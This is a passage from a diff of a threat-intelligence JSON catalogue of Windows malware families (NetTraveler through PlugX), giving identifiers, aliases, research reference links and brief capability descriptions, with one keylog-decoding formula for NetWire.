"3a26ee44-3224-48f3-aefb-3978c972d928", + "value": "NetTraveler", + "description": "" + }, + { + "meta": { + 
"synonyms": [ + "Recam" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", + "https://www.circl.lu/pub/tr-23/", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + ] + }, + "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", + "value": "NetWire RC", + "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", + "value": "Neuron", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasidet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "http://securitykitten.github.io/an-evening-with-n3utrino/", + "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + 
"http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", + "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" + ] + }, + "uuid": "3760920e-4d1a-40d8-9e60-508079499076", + "value": "Neutrino", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jimmy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", + "value": "Neutrino POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + ] + }, + "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", + "value": "NewCore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", + "https://asert.arbornetworks.com/lets-talk-about-newposthings/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", + "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + ] + }, + "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", + "value": "NewPosThings", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", + 
"https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", + "value": "NewsReels", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + ] + }, + "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", + "value": "NewCT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", + "https://twitter.com/benkow_/status/789006720668405760" + ] + }, + "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", + "value": "Nexster Bot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", + "https://twitter.com/PhysicalDrive0/status/842853292124360706", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" + ] + }, + "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", + "value": "NexusLogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", + "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" + ] + }, + "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", + "value": "nitlove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + ] + }, + "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", + "value": "Nitol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bladabindi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", + "value": "NjRAT", + "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", + "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" + ] + }, + "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", + "value": "Nocturnal Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ] + }, + "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", + "value": "Nokki", + "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" + ] + }, + "uuid": "6207668d-af17-44a6-97a2-e1b448264529", + "value": "Nozelesn (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", + "https://twitter.com/malwrhunterteam/status/910952333084971008", + "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", + "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" + ] + }, + "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", + "value": "nRansom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nymain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", + "https://bitbucket.org/daniel_plohmann/idapatchwork" + ] + }, + "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", + "value": "Nymaim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", + "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" + ] + }, + "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", + "value": "Nymaim2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" + ] + }, + "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", + "value": "OddJob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", + 
"https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + ] + }, + "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", + "value": "Odinaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" + ] + }, + "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", + "value": "Olympic Destroyer", + "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", + "https://twitter.com/malwrhunterteam/status/1001461507513880576" + ] + }, + "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", + "value": "OneKeyLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + ] + }, + "uuid": "82733125-da67-44ff-b2ac-b16226088211", + "value": "ONHAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", + "https://www.f-secure.com/weblog/archives/00002764.html" + ] + }, + "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", + "value": "OnionDuke", + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + }, + { + "meta": { + "synonyms": [ + "SBot", + "Onliner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ] + }, + "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", + "value": "OnlinerSpambot", + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", + "value": "OopsIE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", + "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", + "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", + "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", + "https://forum.malekal.com/viewtopic.php?t=21806" + ] + }, + "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", + "value": "Opachki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ] + }, + "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", + "value": "OpGhoul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" + ] + }, + "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", + "value": "OpBlockBuster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + ] + }, + "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", + "value": "OrcaRAT", + 
"description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", + "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", + "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" + ] + }, + "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", + "value": "Orcus RAT", + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" + ] + }, + "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", + "value": "Ordinypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", + "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", + "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" + ] + }, + "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", + "value": "Overlay RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", + "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" + ] + }, + "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", + "value": "OvidiyStealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "luckyowa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + ] + }, + "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", + "value": "owaauth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", + "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", + "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" + ] + }, + "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", + "value": "PadCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ 
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + ] + }, + "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", + "value": "paladin", + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + }, + { + "meta": { + "synonyms": [ + "ZeusPanda" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", + "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", + "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", + "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", + "https://www.spamhaus.org/news/article/771/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", + "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", + "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" + ] + }, + "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", + "value": "PandaBanker", + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant 
of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", + "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" + ] + }, + "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", + "value": "parasite_http", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" + ] + }, + "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", + "value": "Penco", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", + "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", + "value": "PetrWrap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", + 
"https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" + ] + }, + "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", + "value": "Petya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ReRol" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", + "https://community.fireeye.com/external/1093" + ] + }, + "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", + "value": "pgift", + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", + "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", + "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", + "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", + "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" + ] + }, + "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", + "value": "Philadephia Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + 
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + ] + }, + "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", + "value": "Phorpiex", + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", + "https://www.snort.org/rule_docs/1-26941" + ] + }, + "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", + "value": "pipcreat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ] + }, + "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", + "value": "pirpi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + ] + }, + "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", + "value": "Pitou", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", + "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" + ] + }, + "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", + "value": "PittyTiger RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", + "http://blog.kleissner.org/?p=788", + "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", + "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" + ] + }, + "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", + "value": "Pkybot", + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", + "value": "PLAINTEE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", + "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" + ] + }, + "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", + "value": "playwork", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSCookie" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "http://www.freebuf.com/column/159865.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + 
"https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" + ] + }, + "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", + "value": "PLEAD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" + ] + }, + "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", + "value": "Plexor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", + "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + ] + }, + "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", + "value": "Ploutus ATM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", + "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" + ] + }, + "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", + "value": "ployx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Korplug" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + 